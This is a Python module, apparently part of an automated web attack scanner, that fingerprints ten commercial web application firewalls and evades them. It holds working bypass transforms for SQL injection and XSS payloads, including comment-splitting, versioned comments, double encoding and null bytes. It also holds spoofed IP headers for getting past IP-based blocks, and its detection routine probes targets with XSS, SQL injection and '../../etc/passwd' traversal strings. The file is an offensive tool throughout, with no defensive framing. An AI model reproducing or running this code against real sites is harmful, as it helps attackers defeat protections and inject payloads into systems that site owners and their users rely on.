"""WAF Detection & Bypass Engine — identifies and evades Web Application Firewalls."""
from __future__ import annotations
import asyncio
import logging
import re
from typing import Dict, List, Optional, Tuple

logger = logging.getLogger(__name__)

# WAF fingerprints: header patterns → WAF name
WAF_SIGNATURES = {
    "cloudflare": {
        "headers": ["cf-ray", "cf-cache-status", "__cfduid", "cf-request-id"],
        "body": ["cloudflare", "attention required", "cf-error"],
        "status_codes": [403, 503],
    },
    "akamai": {
        "headers": ["x-akamai-transformed", "akamai-grn", "x-akamai-request-id"],
        "body": ["akamai", "reference#", "access denied"],
        "status_codes": [403],
    },
    "aws_waf": {
        "headers": ["x-amzn-requestid", "x-amz-cf-id"],
        "body": ["aws", "request blocked", "waf"],
        "status_codes": [403],
    },
    "imperva": {
        "headers": ["x-iinfo", "x-cdn"],
        "body": ["incapsula", "imperva", "visitorid"],
        "status_codes": [403],
    },
    "f5_bigip": {
        "headers": ["x-wa-info", "bigipserver"],
        "body": ["the requested url was rejected", "support id"],
        "status_codes": [403],
    },
    "modsecurity": {
        "headers": ["mod_security", "nyob"],
        "body": ["mod_security", "not acceptable", "modsecurity"],
        "status_codes": [403, 406],
    },
    "sucuri": {
        "headers": ["x-sucuri-id", "x-sucuri-cache"],
        "body": ["sucuri", "cloudproxy", "access denied - sucuri"],
        "status_codes": [403],
    },
    "wordfence": {
        "headers": [],
        "body": ["wordfence", "generated by wordfence", "your access to this site has been limited"],
        "status_codes": [403, 503],
    },
    "fortiweb": {
        "headers": ["fortiwafsid"],
        "body": ["fortigate", "fortiweb", ".fgtres"],
        "status_codes": [403],
    },
    "barracuda": {
        "headers": ["barra_counter_session"],
        "body": ["barracuda", "barra_counter"],
        "status_codes": [403],
    },
}

# Bypass techniques keyed by WAF type
BYPASS_TECHNIQUES = {
    "default": {
        "case_swap": lambda p: p.swapcase(),
        "double_encode": lambda p: p.replace("%", "%25"),
        "null_byte": lambda p: f"%00{p}",
        "unicode": lambda p: p.replace("<", "%u003c").replace(">", "%u003e"),
        "comment_split": lambda p: p.replace("SELECT", "SEL/**/ECT").replace("UNION", "UN/**/ION"),
        "concat": lambda p: p.replace("'", "'+'" if "'" in p else p),
        "newline": lambda p: p.replace(" ", "\n"),
        "tab": lambda p: p.replace(" ", "\t"),
    },
    "cloudflare": {
        "chunk_transfer": lambda p: p,  # use Transfer-Encoding: chunked
        "ip_rotation_header": lambda p: p,  # X-Forwarded-For rotation
        "rate_slow": lambda p: p,  # slow requests below threshold
    },
    "modsecurity": {
        "comment_inline": lambda p: re.sub(r'(SELECT|UNION|FROM|WHERE)', lambda m: f"/*!{m.group()}*/", p),
        "hex_encode": lambda p: "0x" + p.encode().hex() if len(p) < 50 else p,
    },
}

# Evasion headers
EVASION_HEADERS_POOL = [
    {"X-Forwarded-For": "127.0.0.1"},
    {"X-Originating-IP": "127.0.0.1"},
    {"X-Remote-IP": "127.0.0.1"},
    {"X-Remote-Addr": "127.0.0.1"},
    {"X-Real-IP": "127.0.0.1"},
    {"X-Client-IP": "127.0.0.1"},
    {"X-Forwarded-For": "8.8.8.8"},
    {"X-Custom-IP-Authorization": "127.0.0.1"},
    {"X-Original-URL": "/"},
    {"X-Rewrite-URL": "/"},
    {"Content-Type": "application/x-www-form-urlencoded; charset=ibm037"},
]


class WAFEngine:
    """Detects WAFs and applies bypass techniques to payloads."""

    def __init__(self):
        self.detected_waf: Optional[str] = None
        self.blocked_payloads: List[str] = []
        self.successful_bypasses: List[Dict] = []

    async def detect(self, client, target_url: str) -> Optional[str]:
        """Detect WAF by sending known-blocked payloads and analyzing responses."""
        # Test 1: Normal request baseline
        baseline_resp, _ = await client.get(target_url)
        if not baseline_resp:
            return None

        baseline_headers = {k.lower(): v for k, v in baseline_resp.headers.items()}

        # Test 2: Check headers for WAF signatures
        for waf_name, sigs in WAF_SIGNATURES.items():
            for header in sigs["headers"]:
                if header.lower() in baseline_headers:
                    self.detected_waf = waf_name
                    logger.info(f"WAF detected via header: {waf_name} ({header})")
                    return waf_name

        # Test 3: Send obviously malicious payload
        test_payloads = [
            f"{target_url}?test=<script>alert(1)</script>",
            f"{target_url}?test=' OR 1=1--",
            f"{target_url}?test=../../etc/passwd",
        ]

        for test_url in test_payloads:
            try:
                resp, _ = await client.get(test_url)
                if not resp:
                    continue

                if resp.status_code in (403, 406, 501, 503):
                    body_lower = resp.text.lower()
                    headers_lower = {k.lower(): v.lower() for k, v in resp.headers.items()}

                    for waf_name, sigs in WAF_SIGNATURES.items():
                        # Check body patterns
                        if any(p in body_lower for p in sigs["body"]):
                            self.detected_waf = waf_name
                            logger.info(f"WAF detected via body: {waf_name}")
                            return waf_name
                        # Check response headers
                        for h in sigs["headers"]:
                            if h.lower() in headers_lower:
                                self.detected_waf = waf_name
                                logger.info(f"WAF detected via response: {waf_name}")
                                return waf_name

                    # Generic WAF detection
                    if resp.status_code == 403 and len(resp.text) < 2000:
                        self.detected_waf = "unknown"
                        logger.info("Unknown WAF detected (403 on malicious input)")
                        return "unknown"
            except Exception:
                pass

        logger.info("No WAF detected")
        return None

    def apply_bypasses(self, payload: str, vuln_type: str = "") -> List[str]:
        """Generate bypass variants for a payload based on detected WAF."""
        variants = [payload]  # Original always included

        # Get WAF-specific techniques
        waf_techniques = BYPASS_TECHNIQUES.get(self.detected_waf or "default", {})
        default_techniques = BYPASS_TECHNIQUES["default"]

        all_techniques = {**default_techniques, **waf_techniques}

        for name, transform in all_techniques.items():
            try:
                variant = transform(payload)
                if variant and variant != payload and variant not in variants:
                    variants.append(variant)
            except Exception:
                pass

        return variants[:15]  # Cap at 15 variants

    def get_evasion_headers(self) -> Dict[str, str]:
        """Return headers that may bypass WAF IP-based blocks."""
        import random
        if self.detected_waf:
            return random.choice(EVASION_HEADERS_POOL)
        return {}

    def record_block(self, payload: str):
        """Record a blocked payload for learning."""
        if payload not in self.blocked_payloads:
            self.blocked_payloads.append(payload)

    def record_bypass(self, original: str, variant: str, technique: str):
        """Record a successful bypass for learning."""
        self.successful_bypasses.append({
            "original": original, "variant": variant,
            "technique": technique, "waf": self.detected_waf,
        })

    def stats(self) -> Dict:
        return {
            "detected_waf": self.detected_waf,
            "blocked_count": len(self.blocked_payloads),
            "successful_bypasses": len(self.successful_bypasses),
        }
